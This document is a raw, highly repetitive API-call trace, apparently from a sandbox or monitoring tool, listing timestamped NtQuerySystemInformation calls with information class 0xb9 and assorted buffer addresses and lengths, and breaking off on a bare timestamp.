[0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x50, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x50, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x28, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x28, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce00, Length=0x20, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd80, Length=0x20, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x38, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce50, Length=0x20, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7e0, Length=0x28, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x20, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x28, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd550, Length=0x20, ResultLength=0x0) [0226.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x20, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x20, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x20, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] 